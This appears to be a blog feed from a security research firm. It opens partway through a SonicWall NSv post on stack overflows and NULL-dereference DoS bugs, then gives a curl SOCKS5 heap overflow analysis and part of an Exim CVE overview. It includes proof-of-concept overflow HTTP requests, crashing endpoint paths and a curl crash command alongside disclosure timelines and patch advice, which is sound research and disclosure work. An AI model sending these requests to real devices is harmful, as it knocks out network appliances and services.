GET /api/sonicos/dynamic-file/getBookmarkList.json?userName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1

Nice! Although accessing this endpoint requires authentication, as an SSLVPN user, this bug appeared to be pretty serious, enabling RCE as root. We celebrated our win, and only later thought to try the same bug on the non-debug version of the SonicWall appliance.

Saved by the compiler

Unfortunately, when we tried to replicate this vulnerability on a non-debug instance of the SonicWall, we found the machine would fail in a significantly more graceful manner, with a nasty SIGABRT instead of a lovely SIGSEGV:

What’s happening here?! Where’s our nice RCE?!

Well, let’s take a look at the differences between the debug and ‘release’ versions of the code.

The debug version, which we can overflow:

And the release version, which we cannot:

What’s this?! “memcpy_chk”?! Is this what’s causing our issues?

It turns out, when gcc is supplied with the argument -DFORTIFY_SOURCE, calls to memcpy (and a few other functions) will be replaced by a call to memcpy_chk, which will perform a similar duty to the original memcpy but will also check the destination buffer length (you can see it in the last argument in the release code screenshot again). memcpy_chk will ensure that any potential overrun is caught, and instead of overflowing the destination buffer (leading to that juicy RCE), the target will call abort and exit immediately. D’oh!

This has the effect of downgrading our RCE to a DoS bug when run against release versions of the SonicWall NSv. We estimate that the portion of users running the debug version is vanishingly small (if you’re running the debug version in production, we’d love to hear from you!), and so sadly reported this as an authenticated DoS bug to SonicWall. The CVE for this one is CVE-2023-39276 (see below for more info on fixed versions of the code).

Spurned by our near-miss, we took a look through some of the other handlers, and spotted another stack overflow, this time in the sonicflow.csv handler, centering around the sn querystring parameter.

The same sort of thing happens, with a querystring parameter unsafely copied into a stack buffer:

char v21[64];

StringData = parseQueryStringData(a2);
for ( i = StringData; i; i = *i )
{
...
   if ( !strcmp(i->paramName, "sn") )
     strcpy(v21, i->paramData);
...
}
freeQueryStringData(StringData);

Whoops! Let’s feed it some A’s once again:

GET /api/sonicos/dynamic-file/sonicflow.csv?sn=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1

Another stack overflow - sadly with the same caveat, it is only exploitable on the NSv we analysed as a DoS in release mode (while debug mode is exploitable for full RCE).

We found the same bug was reachable from the appflowsessions.csv endpoint, and duly reported the bug to SonicWall. This vulnerability was assigned CVE-2023-39277.

A whole bunch of DoS bugs

So, at this juncture, we’ve got three CVEs - a hardcoded credential, and two stack overflows. Neat! What’s next?

Well, as regular readers might remember, some time ago we located a DoS bug in a competing device, Fortinet’s FortiGuard, which relied on sending a GET request to an endpoint which would usually only receive a POST.

Since checks for a request body were erroneously omitted, the Fortinet device would assume a body was present on the GET request, and attempt to reference invalid memory at the NULL address. We wondered, are such bugs more common than we thought? Perhaps a similar bug could exist in the SonicWall device, too.

To search for this bug, we decided to extract routes from the binary directly (thus hitting lots of endpoints that aren’t currently used and thus might be missed by conventional spidering). In addition to the “dynamic” handlers above, we located a few tables containing route information.

Here’s the first:

.data:0000000008CB64C0 C9 DF 8C 04 00+off_8CB64C0     dq offset aActivationview_0 ; "activationView.html"
.data:0000000008CB64C8 00 08 00 00 00+                dq 800h
.data:0000000008CB64D0 78 33 0B 0A 00+                dq offset qword_A0B3378
.data:0000000008CB64D8 DD DF 8C 04 00+                dq offset aActiveconnecti_2 ; "activeConnectionsMonitor.html"
.data:0000000008CB64E0 00 21 00 00 00+                dq 2100h
.data:0000000008CB64E8 78 33 0B 0A 00+                dq offset qword_A0B3378
.data:0000000008CB64F0 FB DF 8C 04 00+                dq offset aAddafobjgroupd ; "addAFObjGroupDlg.html"
.data:0000000008CB64F8 00 00 00 00 00+                align 20h
.data:0000000008CB6500 78 33 0B 0A 00+                dq offset qword_A0B3378
.data:0000000008CB6508 11 E0 8C 04 00+                dq offset aAddantispamall ; "addAntispamAllowListDlg.html"
.data:0000000008CB6510 00 09 00 00                    dd 900h
.data:0000000008CB6514 00 00 00 00                    dd 0
.data:0000000008CB6518 78 33 0B 0A 00+                dq offset qword_A0B3378
.data:0000000008CB6520 2E E0 8C 04 00+                dq offset aAddantispamrej ; "addAntispamRejectListDlg.html"

Here we have a series of structures, with each containing an endpoint filename, some kind of ‘flags’ integer (which actually stores which methods are valid for each endpoint, along with required authentication information), and some kind of state object.

We wrote some quick IDAPython to pull out all the URLs, and continued our search. We found another table, containing far more interesting data. It’s quite verbose, as you can see:

.data:0000000008BCB240                ; sonicos_api_hateoas_entry URLHandlerTable
.data:0000000008BCB240 99 10 23 04 00+URLHandlerTable dq offset aApiSonicos_0 ; name
.data:0000000008BCB240 00 00 00 00 00+                                        ; DATA XREF: sub_189B1AD+19↑o
.data:0000000008BCB240 00 00 00 00 00+                                        ; sonicOsApi_serviceRequest+164↑o
.data:0000000008BCB248 00 01 01 00 00+                dq 0                    ; field_8 ; "/api/sonicos"
.data:0000000008BCB250 00 00 00 00 5E+                dq 101h                 ; info_GET.field_0
.data:0000000008BCB258 E1 8B 01 00 00+                dq offset sub_18BE15E   ; info_GET.handlerFunc
.data:0000000008BCB260 00 00 04 00 00+                dd expectedEmptyRequestBody; info_GET.flags
.data:0000000008BCB264 00 00 00 00 00+                dd 0                    ; info_GET.field_14
.data:0000000008BCB268 01 00 00 00 00+                dd 1                    ; info_GET.somethingToDoWithContentType_in
.data:0000000008BCB26C 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB284 00 00 00 00 00+                dd 1                    ; info_GET.somethingToDoWithContentType_out
.data:0000000008BCB288 00 00 00 00 00+                db 6, 17h dup(0)
.data:0000000008BCB2A0 00 00 00 00 00+                dw 1                    ; info_GET.flagsToDoWithContentType
.data:0000000008BCB2A2 00 00 00 01 00+                db 6 dup(0)
.data:0000000008BCB2A8 00 00 06 00 00+                dq 0                    ; info_POST.field_0
.data:0000000008BCB2B0 00 00 00 00 00+                dq 0                    ; info_POST.handlerFunc
.data:0000000008BCB2B8 00 00 00 00 00+                dd 0                    ; info_POST.flags
.data:0000000008BCB2BC 00 00 00 00 00+                dd 0                    ; info_POST.field_14
.data:0000000008BCB2C0 00 00 00 00 00+                dd 0                    ; info_POST.somethingToDoWithContentType_in
.data:0000000008BCB2C4 00 01 00 00 00+                db 18h dup(0)
.data:0000000008BCB2DC 00 00 00 00 00+                dd 0                    ; info_POST.somethingToDoWithContentType_out
.data:0000000008BCB2E0 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB2F8 00 00 00 00 00+                dw 0                    ; info_POST.flagsToDoWithContentType
.data:0000000008BCB2FA 00 00 00 00 00+                db 6 dup(0)
.data:0000000008BCB300 00 00 00 00 00+                dq 0                    ; info_PUT.field_0
.data:0000000008BCB308 00 00 00 00 00+                dq 0                    ; info_PUT.handlerFunc
.data:0000000008BCB310 00 00 00 00 00+                dd 0                    ; info_PUT.flags
.data:0000000008BCB314 00 00 00 00 00+                dd 0                    ; info_PUT.field_14
.data:0000000008BCB318 00 00 00 00 00+                dd 0                    ; info_PUT.somethingToDoWithContentType_in
.data:0000000008BCB31C 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB334 00 00 00 00 00+                dd 0                    ; info_PUT.somethingToDoWithContentType_out
.data:0000000008BCB338 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB350 00 00 00 00 00+                dw 0                    ; info_PUT.flagsToDoWithContentType
.data:0000000008BCB352 00 00 00 00 00+                db 6 dup(0)
.data:0000000008BCB358 00 00 00 00 00+                dq 0                    ; info_PATCH.field_0
.data:0000000008BCB360 00 00 00 00 00+                dq 0                    ; info_PATCH.handlerFunc
.data:0000000008BCB368 00 00 00 00 00+                dd 0                    ; info_PATCH.flags
.data:0000000008BCB36C 00 00 00 00 00+                dd 0                    ; info_PATCH.field_14
.data:0000000008BCB370 00 00 00 00 00+                dd 0                    ; info_PATCH.somethingToDoWithContentType_in
.data:0000000008BCB374 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB38C 00 00 00 00 00+                dd 0                    ; info_PATCH.somethingToDoWithContentType_out
.data:0000000008BCB390 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB3A8 00 00 00 00 00+                dw 0                    ; info_PATCH.flagsToDoWithContentType
.data:0000000008BCB3AA 00 00 00 00 00+                db 6 dup(0)
.data:0000000008BCB3B0 00 00 00 00 00+                dq 0                    ; info_DELETE.field_0
.data:0000000008BCB3B8 00 00 00 00 00+                dq 0                    ; info_DELETE.handlerFunc
.data:0000000008BCB3C0 00 00 00 00 00+                dd 0                    ; info_DELETE.flags
.data:0000000008BCB3C4 00 00 00 00 00+                dd 0                    ; info_DELETE.field_14
.data:0000000008BCB3C8 00 00 00 00 00+                dd 0                    ; info_DELETE.somethingToDoWithContentType_in
.data:0000000008BCB3CC 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB3E4 00 00 00 00 00+                dd 0                    ; info_DELETE.somethingToDoWithContentType_out
.data:0000000008BCB3E8 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB400 00 00 00 00 00+                dw 0                    ; info_DELETE.flagsToDoWithContentType
.data:0000000008BCB402 00 00 00 00 00+                db 6 dup(0)
.data:0000000008BCB408 00 00 00 00 00+                dq 0                    ; info_HEAD.field_0
.data:0000000008BCB410 00 00 00 00 00+                dq 0                    ; info_HEAD.handlerFunc
.data:0000000008BCB418 00 00 00 00 00+                dd 0                    ; info_HEAD.flags
.data:0000000008BCB41C 00 00 00 00 00+                dd 0                    ; info_HEAD.field_14
.data:0000000008BCB420 00 00 00 00 00+                dd 0                    ; info_HEAD.somethingToDoWithContentType_in
.data:0000000008BCB424 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB43C 00 00 00 00 00+                dd 0                    ; info_HEAD.somethingToDoWithContentType_out
.data:0000000008BCB440 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB458 00 00 00 00 00+                dw 0                    ; info_HEAD.flagsToDoWithContentType
.data:0000000008BCB45A 00 00 00 00 00+                db 6 dup(0)
.data:0000000008BCB460 00 00 00 00 00+                dq 0                    ; info_COMPLETE.field_0
.data:0000000008BCB468 00 00 00 00 00+                dq 0                    ; info_COMPLETE.handlerFunc
.data:0000000008BCB470 00 00 00 00 00+                dd 0                    ; info_COMPLETE.flags
.data:0000000008BCB474 00 00 00 00 00+                dd 0                    ; info_COMPLETE.field_14
.data:0000000008BCB478 00 00 00 00 00+                dd 0                    ; info_COMPLETE.somethingToDoWithContentType_in
.data:0000000008BCB47C 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB494 00 00 00 00 00+                dd 0                    ; info_COMPLETE.somethingToDoWithContentType_out
.data:0000000008BCB498 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB4B0 00 00 00 00 00+                dw 0                    ; info_COMPLETE.flagsToDoWithContentType
.data:0000000008BCB4B2 00 00 00 00 00+                db 5 dup(0)
.data:0000000008BCB4B7 00 00 00 00 00+                db 0                    ; field_277
.data:0000000008BCB4B8                ; sonicos_api_hateoas_entry

It’s a big struct, but it’s actually simple.

The first element is the name of the endpoint being described (here /api/sonicos). This is followed by six structures, each describing its behaviour when queried using six verbs - GET, POST, PUT, PATCH, DELETE, HEAD, and the SonicWall-unique COMPLETE. Each of those structures specifies a handler function and some flags, along with some miscellaneous information. The flags specify if the request should contain a request body, or if access should only be granted to authenticated users.

Again, we wrote some quick IDAPython to enumerate the endpoints, and added them to our list.

Now satisfied that we’ve amassed details of as many endpoints as we can (slightly over 600), we built an extremely low-tech fuzzer, by simply taking a list of endpoints and using a regular expression to turn each into a cURL request.

Sometimes simple is best, and there was no need to even write a Python script in this case! We went from our list of endpoints to a file similar to this:

curl  https://192.168.70.77:4433/api/sonicos/dynamic-file/IgmpState.xml --insecure --header "Authorization: Bearer [truncated]" --header "Content-Type: application/json, text/plain, */*"
curl  https://192.168.70.77:4433/api/sonicos/dynamic-file/accessRuleStats.xml --insecure --header "Authorization: Bearer [truncated]" --header "Content-Type: application/json, text/plain, */*"
curl  https://192.168.70.77:4433/api/sonicos/dynamic-file/accessRuleStats.xml --insecure --header "Authorization: Bearer [truncated]" --header "Content-Type: application/json, text/plain, */*"

If you’re following along at home, note the Content-Type header, which is required for handlers to be called.

Somewhat surprisingly, our 600-line batch script was successful in crashing the SonicWall appliance, with multiple endpoints causing individual crashes.

Each time we ran it, we simply took note of which URL crashed the device, commented it out, and re-ran the script to see if any other endpoints exhibited the same behaviour. Amazingly, we found no less than seven endpoints that crashed the SonicWall device in no less than six different code paths!

While I won’t bore you with the details of each, here’s one which is a good example of what we found - fetching from any of these two endpoints, after authentication, causes a NULL dereference.

GET /api/sonicos/dynamic-file/ssoStats-[any string].xml
GET /api/sonicos/dynamic-file/ssoStats-[any string].wri

Here’s a handy table of the codepaths and endpoints we found:

CVE	Endpoint	Type	Impact
CVE-2023-39278	`/api/sonicos/main.cgi`	Abort due to assertion failure	VPN-user authenicated DoS
CVE-2023-39279	`/api/sonicos/dynamic-file/getPacketReplayData.json`	NULL dereference	VPN-user authenicated DoS
CVE-2023-39280	`/api/sonicos/dynamic-file/ssoStats-[any string].xml` or `/api/sonicos/dynamic-file/ssoStats-[any string].wri`	NULL dereference	VPN-user authenicated DoS
CVE-2023-41711	`/api/sonicos/dynamic-file/prefs.exp`	NULL dereference	VPN-user authenicated DoS
CVE-2023-41711	`/api/sonicos/dynamic-file/sonicwall.exp`	NULL dereference	VPN-user authenicated DoS
CVE-2023-41712	`/api/sonicos/dynamic-file/plainprefs.exp`	Abort due to assertion failure	VPN-user authenicated DoS

Conclusion

So, what have we got, in total? Well, five CVEs over seven endpoints above, plus the following:

CVE	Endpoint	Type	Impact
CVE-2023-41713	Unknown	Hard-coded credentials	Unknown
CVE-2023-39277	`/api/sonicos/dynamic-file/sonicflow.csv` or `/api/sonicos/dynamic-file/appflowsessions.csv`	Stack buffer overflow	VPN-user authenicated DoS (or RCE in debug mode)
CVE-2023-39276	`/api/sonicos/dynamic-file/getBookmarkList.json`	Stack buffer overflow	VPN-user authenicated DoS (or RCE in debug mode)

Not a bad haul!

It is interesting - and slightly worrying, if we’re totally honest - that we found so many very simple bugs using our simple “regex and curl”-based “fuzzer”. Simple bugs like this simply shouldn’t exist on a ‘hardened’ border device like this. It is likely that the high barrier to entry (FDE, for example) has excluded many researchers who could otherwise have found these very straightforward bugs. It is very fortunate (and no doubt deliberate) that SonicWall build their NSv’s main codebase with FORTIFY_SOURCE.

The real moral of the story is a lesson for attackers and fellow researchers - attack ‘hard’ targets, with significant barriers to entry, and often you’ll be surprised by just how ‘soft’ they are.

All of these issues have been fixed by SonicWall. Depending on your device, the specific version containing updates may vary - refer to SonicWall's remediation advice, summarised below. Those who use the SSLVPN functionality are advised to upgrade to avoid potential DoS vulnerabilities, and those that run their devices in debug mode - if such users exist! - are advised to upgrade as a matter of urgency to avoid exposure to two authenticated RCE bugs.

In addition to assigning CVE for these issues, and issuing fixes, SonicWall took the extra step of providing us with a test build of their router firmware so that we could double-check that issues had been fixed, a useful extra step to ensure the safety of their users. We also appreciate their recognition in admitting watchTowr to their ‘hall of fame’.

Timeline

Date	Detail
28th June 2023	Initial report to SonicWall PSIRT
29th June 2023	SonicWall PSIRT acknowledges report
6th July 2023	SonicWall PSIRT reports progress, requests more information for certain bugs
6th July 2023	watchTowr responds with more detail
10th August 2023	SonicWall PSIRT requests extension of 90-day grace period to “October 12-17th”
13th August 2023	watchTowr grants extension
8th September 2023	SonicWall PSIRT shares CVE details with watchTowr along with internal test build
24th September 2023	watchTowr confirms internal test build fixes bugs
17th October 2023	SonicWall PSIRT release fixes and advisory, https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0012

watchTowr Labs - Blog
The Sky Has Not Yet Fallen - Curl (CVE-2023-38545)Aliz Hammond
11 October 2023 at 12:01

The Sky Has Not Yet Fallen - Curl (CVE-2023-38545)

watchTowr Labs - Blog

By: Aliz Hammond

11 October 2023 at 12:01

The Sky Has Not Yet Fallen - Curl (CVE-2023-38545)

There are few packages as ubiquitous as the venerable cURL project. With over 25 years of development, and boasting “over ten billion installations”, it’s easy to see why a major security flaw could bring the Internet to a standstill - it’s on our endpoints, it’s on our routers, it’s on our IoT devices. It’s everywhere. And it’s written in C - what could go wrong?

Well, quite a lot, it seems.

A few months ago, the cURL maintainers warned us of a terrible, world-ending bug in their software, causing administrators and technical end-users alike to panic. Would attackers be able to hijack my enterprise router? My TV? My PDU, even!? The far-reaching effects of a real cURL RCE can not be overstated.

Fortunately, once the bug was released, it turned out to be a bit of (in popular parlance) “a nothingburger”, requiring a very specific environment in order to metastasise into real danger. A close shave, but the world could rest easy again.

Last week, however, it looked liked history was repeating itself, as the cURL project announced a “severity HIGH CVE”. Administrators were urged to be ready to upgrade the second that patches were available (scheduled for today, October 11th), or suffer the dire consequences. Many were skeptical, some were worried.

Theories were abound - could this allow trivial SSRF vulnerabilities to be trivially converted into RCEs across the Internet? Could we see massive libcurl library exploitation in seemingly benign software that just made simple GET requests?

Don’t worry - patches are here, and we’re here to cut through the hype and figure out what’s actually going on.

Fumbling the Embargo

Well, the it seems bug dropped a little bit early, as a publicly-viewable patch was committed to RedHat’s curl repository. The patch looks pretty simple, and fortunately for us, comes with a test case to trigger the bug. Great! Let’s dig in and see what changed.

That looks pretty straightforward. Two things have been removed: a warning (replaced with an error), and an assignment to the socks5_resolve_local variable. The comments above solidify our diagnosis:

If you’ve used a SOCKS5 proxy, you may be aware that DNS resolution usually occurs on the ‘server’ end of the connection - the client requests a hostname, and the server does the neccessary DNS lookup to facillitate connection. However, the SOCKS specification states that hostnames must not exceed 255 characters, and so the developer who wrote this code was careful to avoid sending such long requests. Instead, if a request was submitted with a long hostname, the local system would simply resolve the host the itself, instead of using the SOCKS proxy.

No problem here, but if we take a look at other places where this socks5_resolve_local variable is assigned, we can see it near the top of the main Curl_SOCKS5 function. This function is invoked every time there is activity on the SOCKS connection.

CURLcode Curl_SOCKS5( .. )
{
bool socks5_resolve_local =
    (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

This line simply enables the default behavior of resolving remotely, which has the unfortunate effect of undoing all the careful hostname-length checking that has been done in the previous invokation, leading to an attempt to remotely resolve a hostname which has failed the length check. The remote-resolution logic assumes that the hostname will never exceed 255 bytes, understandably, leading to a heap overflow.

The overflow actually occurs in the same function, in the following code snippet:

unsigned char *socksreq = &conn->cnnct.socksreq[0];

len = 0;
socksreq[len++] = 5; /* version (SOCKS5) */
socksreq[len++] = 1; /* connect */
socksreq[len++] = 0; /* must be zero */

if(!socks5_resolve_local) {
  socksreq[len++] = 3; /* ATYP: domain name = 3 */
  socksreq[len++] = (char) hostname_len; /* one byte address length */
  memcpy(&socksreq[len], hostname, hostname_len); /* address w/o NULL */
...

As you can see, we’re copying the hostname into this socksreq variable, which is itself assigned from the conn->cnnct.socksreq field. Since the limit of 255 bytes has been bypassed, the hostname may be anywhere up to approximately 64KB.

What does the bug affect?

Of course, vulnerability (and thus exploitation) hinges on this destination buffer cnnct.socksreq being smaller than the size of a potential hostname. At first glance, the official documentation appears to state that, in the default configuration, this is not the case:

An overflow is only possible in applications that do not set CURLOPT_BUFFERSIZE or set 
it smaller than 65541. Since the curl tool sets CURLOPT_BUFFERSIZE to 100kB by default 
it is not vulnerable unless rate limiting was set by the user to a rate smaller than 
65541 bytes/second.

But we mustn’t jump to conclusions without reading the full document. There’s a (bolded!) caveat at the bottom of the page.

**The analysis in this section is specific to curl version 8.** Some older versions of curl 
version 7 have less restriction on hostname length and/or a smaller SOCKS negotiation 
buffer size that cannot be overridden by [CURLOPT_BUFFERSIZE](<https://curl.se/libcurl/c/CURLOPT_BUFFERSIZE.html>).

It is, indeed, easy to cause version 7.74.0 of the cURL runtime to segfault with a public PoC:

# gdb --args curl  -vvv -x socks5h://172.17.0.1:9050 $(python3 -c "print(('A'*10000), end='')")
[truncated]
(gdb) run
Starting program: /usr/local/bin/curl -vvv -x socks5h://172.17.0.1:9050 AAAAAAAAA[truncated]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
*   Trying 172.17.0.1:9050...
* SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=10000]
* SOCKS5 connect to AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[truncated]
Program received signal SIGSEGV, Segmentation fault.
0x00007f529d9f0aec in Curl_resolver_kill () from /usr/local/lib/libcurl.so.4
(gdb) x/1i $pc
=> 0x7f529d9f0aec <Curl_resolver_kill+28>:      cmp    QWORD PTR [rdi],0x0
(gdb) info registers rdi
rdi            0x4141414141414141  4702111234474983745
(gdb)

Yikes! Clearly the out-of-the box cURL is vulnerable, to something at least! Although this simple PoC isn’t actually overflowing the SOCKS context buffer itself, we’ve broken the error handling and caused enough corruption to read an arbitrary memory location - clearly something’s not so right. Given this instability, combined with the lack of public analysis on version 7, we’d advise anyone still running version 7 to upgrade to version 8 at their earliest convenience..

Summary

So here we have it - a heap overflow in cURL, and in libcURL, the embedded version. Fortunately (for defenders) it requires use of a SOCKS proxy, and it only affects a well-defined range of cURL versions.

So it’s not world-ending, but it’s fairly bad, particularly for users of a 7.x version of cURL. The real problem with bugs such as these is the amount of disparate codebases and embedded devices that contain libcURL, and will now need patching.

A frank and informative analysis by the author of the vulnerable code notes that the bug has been in the cURL codebase for 1315 days - enough to filter through into appliances and other “oops I forgot about that one” devices. I suspect we’ll be patching this one for quite some time.

FAQ

In what is becoming a regular feature of watchTowr blog posts, here’s a quick question-and-answer section to quell any hopefully misplaced panic:

Q) Which versions are affected?

A) Affected versions are libcURL above (and including) 7.69.0 and up to (and including) 8.3.0. Versions below 7.69.0 are not affected.

Q) Is watchTowr aware of any trivially-exploitable enterprise-grade software where this vulnerability could be abused?

A) At this point in time, no.

Q) Are the conditions necessary for an external-party to exploit this vulnerability common?

A) No.

Q) Does this bug require a malicious SOCKS proxy?

A) No, it does not, it just needs a connection to a malicious host over a SOCKS proxy.

Q) I use the command-line version of cURL all the time! It’s version 8, but below the fixed 8.4.0. Do I need to upgrade?

A) Well, you should always upgrade, because it’s a Best Practice (TM). But the bug likely isn’t exploitable on your system, so rest easy.

Q) I use the command-line version of cURL all the time, and it’s only version 7 - but I never use a SOCKS proxy. Should I be worried?

A) The bug doesn’t affect you, since you don’t use a SOCKS proxy. Having said that, I’d advise caution - it may be difficult to ensure that malicious users can’t force you to use a SOCKS proxy (for example, as an elevation or lateral-movement path). Upgrading, if at all possible, is always the safest option.

Q) I use the command-line version of cURL all the time, and it’s only version 7 - and I use a SOCKS proxy. How about me?

A) Ooof, that’s a bad scenario. While the cURL documentation isn’t clear on the exploitability of the v7 commandline tool, we’ve shown that at least some versions will segfault, although it isn’t clear if this is due to a heap overflow condition. In the absence of a clear answer on exploitability, we would advise you to upgrade to version 8 as a matter of urgency.

Q) I can’t upgrade! How can I mitigate this vulnerability?

A) You can mitigate by avoiding the use of a SOCKS proxy, if at all possible. If you run cURL in a privileged context, be aware that various options may enable a SOCKS proxy, both from the command-line, URL, or environment variables, and you may need to sanitize these to prevent a malicious user from connecting to a malicious SOCKS proxy.

Q) Is this vulnerability going to turn every SSRF into RCE?

A) Sadly not.

watchTowr Labs - Blog
90s Vulns In 90s Software (Exim) - Is the Sky Falling?Aliz Hammond
2 October 2023 at 12:02

90s Vulns In 90s Software (Exim) - Is the Sky Falling?

watchTowr Labs - Blog

By: Aliz Hammond

2 October 2023 at 12:02

90s Vulns In 90s Software (Exim) - Is the Sky Falling?

A few days ago, ZDI went public with no less than six 0days in the popular mail server Exim. Ranging from ‘potentially world-ending' through to ‘a bit of a damp squib’, these bugs were apparently discovered way back in June 2022 (!) - but naturally got caught up in the void between the ZDI and Exim for quite some time. Mysterious void.

As a brief background on Exim, “Exim is a message transfer agent (MTA) originally developed at the University of Cambridge for use on Unix systems connected to the Internet”. Exim is in use on millions of systems worldwide, and has a history of ‘interesting vulnerabilities’.

Given this, there has been a lot of panic about the issues (which we attempted to quell somewhat with our tweet thread on the issues), but they boil down to a few admittedly dangerous bugs that require a very specific environment to be accessible.

For example, CVE-2023-42117 is only going to affect you if you use Exim’s ‘proxy’ functionality with an untrusted proxy, which seems like an unlikely scenario. Here’s a quick rundown of the bugs and the functionality they depend on:

CVE	CVSS	Requirements
CVE-2023-42115	9.8	“External” authentication scheme configured and available
CVE-2023-42116	8.1	“SPA” module (used for NTLM auth) configured and available
CVE-2023-42117	8.1	Exim Proxy (different to a SOCKS or HTTP proxy) in use with untrusted proxy server
CVE-2023-42118	7.5	“SPF” condition used in an ACL
CVE-2023-42114	3.7	“SPA” module (used for NTLM auth) configured to authenticate the Exim server to an upstream server
CVE-2023-42119	3.1	An untrusted DNS resolver

You can see that the bugs have quite a lot of requirements. Most of us don’t need to worry. If you’re one of the unlucky ones who uses one of the listed features though, you’ll be keen to get more information before undertaking ZDI’s advice to “restrict interaction with the application”.

